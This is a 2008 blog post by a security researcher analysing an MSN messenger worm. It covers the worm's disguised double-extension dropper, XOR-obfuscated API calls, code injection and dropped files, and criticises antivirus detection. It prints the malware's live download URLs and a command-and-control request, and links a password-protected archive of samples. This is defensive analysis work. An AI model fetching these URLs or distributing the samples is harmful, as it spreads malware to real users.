Wednesday, November 12, 2008

A new MSN Worm

Are viruses attracted to me specifically or it happens to everyone and they just don't notice or say nothing about it. It getting really hard to speak with people using instant messengers and to be sure it is them sending you a message and not a virus.

Before i begin, let's notice a few close viruses :)This: http://www.cisrt.org/enblog/read.php?106Is a different one, older one from July. Reported and still not fully detected by vendors.

Now for the painful part, this:http://blog.threatfire.com/2008/06/msn-im-worm.htmla little older variant that was covered in June!!! that is 5 month ago!! the detection rates were nasty, they still are as you will see afterwards...The point I don't get is why don't AV vendors take care of the missed detections at least AFTER some security researcher publishes an analysis?!

I got a message from a friend who is currently having a trip in thailand and i was amazed to see that his computer sent me a message with a link with my msn email in it. I clicked the link and here a file download prompt pops up and the file name is: "virus-PIC006.JPG-www.myspace.exe".Well, as tired as i may be, i would never be THAT tired to execute it :)

So i saved it and started to analyze!Well what is it? it is a self extracting cab archive(almost original :) with resource details spoofed to be a microsoft file! (it even looks like it was edited manually using a tool such as Resource Hacker)File Version: "6.0.2900.2180"Description: "Win32 Cabinet Self-Extractor " (may be they thought we won't notice the spaces :)Company: "Microsoft Corporation"File Version: "6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)"Internal Name: "Wextract "Language: "English (United States)"Original File name: "WEXTRACT.EXE "Product Name: "Microsoft® Windows® Operating System"Product Version: "6.00.2900.2180"

Well again it seems that Winrar is more effective than an Anti-Virus, where it detects it as a self-extracting archive so i know it's no simple exe:

The funniest think about this "trap file" is that it has double extension of .jpg...........exe that comes with the default icon of a jpeg file

BUT when you switch to DETAILS view in the browser, then you see its 16x16 icon which is a setup icon:

Dear bad guys! use some of that money you steal to do some Q&A for your bot droppers!O.K let's see if our friends know it:

9 of 36...wow!Could it be that Symantec, Mcafee, Kaspersky, F-Secure, Panda, Sophos all the great brands does not even suspect it?! and that Microsoft which is quite new in the AV business catches it?! I want to point out Dr. Web again for being a good detector(comparing to the concept of an Anti-Something) as Kaspersky once were, before they went to enterprise and from tech to GUI (if i was kaspersky, i would by dr web...just a thought)

So we extract the sfx and we get a file called test.exe with a jpg icon, this time it's not an archive, here comes the real shame, it is not even packed!!!Let's see if our friends know it:

it is just a simple VC++ executable that uses dynamic function calls with the simplest use of a rolling xor running on the string "somenigz', quite amusing :)

You can see these letters "Üöâƒö¥-+¯ò¥¥" which are clearly XORed sent to a function, the classic "decrypt my dll name and then the function in it and call it". Of course "sub_401000" is the decrypt function:

This shows us this was not written by simple kids! this is a professional code injection using thread contexts, this teaches us that the guys "on the wild" have learned beyond besides CreateRemoteThread!!!

It seems that this version relates to: burimilol.com which is unknown to "norton safe web" (yeah right): https://safeweb.norton.com/report/show?name=burimilol.com but it's older variant is known "burimilol.net": https://safeweb.norton.com/report/show?name=burimilol.netWhat separates us from the criminals is the "protected domain services" which is mostly used by criminals...again no internet cops :)

Now it executes itself! parses its duplicate's PE and sections and injects code into it!Then it dumps a hidden exe in %windir%(c:\windows) called fxstaller.exe(48kb) which this time has a jpg icon in both the 32x32 and the 16x16 :)

This exe drops/downloads image.exe(48kb) in a new temp folder in %temp%

This results are crippy!!! i guess Dr.Web also failed and there is no one left to trust but Microsoft!Then service.exe(144kb) is dropped at %windir$\system32\service.exe, a hidden file with a darth vader icon :)

This exe of darkness downloads and executes a file to c:\msn.exe

Now some deeper information, for the researchers among us. Why their url is not blocked?! because they are tricky!!!They "try" do download http://www.freewebtown.com/tatrusa/test2.jpg which redirects tohttp://fwt.txdnl.com/6-40/t/a/tatrusa/test2.jpgThen it requestsGET /cn?sid=40545F5A4F1F545B365C365836085B51363A0C1B1F000A0C4939080A02495B4F0A000D542F5C2B282F2D5A5C5A2D5E2C5D5A5B282B2B5E582C5F5151592D2C515D2A5A5A4F081D544F131854594F1D1954594F080F0F000D54585F515D51504F04061B1901000D5408075B0E4F1B0C1F000D54505C505B692901 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)Host: 85.17.166.233

Then it "trys" to download http://www.freewebtown.com/tatrusa/oos.jpg and again redirected to: http://fwt.txdnl.com/6-40/t/a/tatrusa/oos.jpgThen it downloads http://www.j2arts.com/images/msn.exe to c:\msn.exeFrom here it looks like it is the same old tech viruses (keyloggers and the classics, i don't have time for these files.....):rundll32.exe C:\WINDOWS\system32\vtUolLBS.dll,a (vtUolLBS == random name)rundll32.exe C:\WINDOWS\system32\nnnljiiI.dll,crundll32.exe C:\WINDOWS\system32\iifgHbyY.dll,a

The AV vendors should receive my scanned files from virustotal.I will also make an exception on this one and upload a sample for all the involved executable!http://www.linkstofiles.com/MSNWorm.rararchive password: "virus"

Stop them, sue them, black list them, hack them, they are stealing from all of us!Fight for digital law enforcement!!!

About Me

Hacking computers since i am 12. Published more then 65 advisories before the age of 17. Before 18 worked in Finjan Software as Senior Security Researcher, published 6 advisories in Finjan. Been in the Israeli Army Intelligence for 3 years. Started a security startup company Aspect9. I Was VP Technologies at Citadel Technologies, now CEO at Defensia (http://www.defensia.co.il)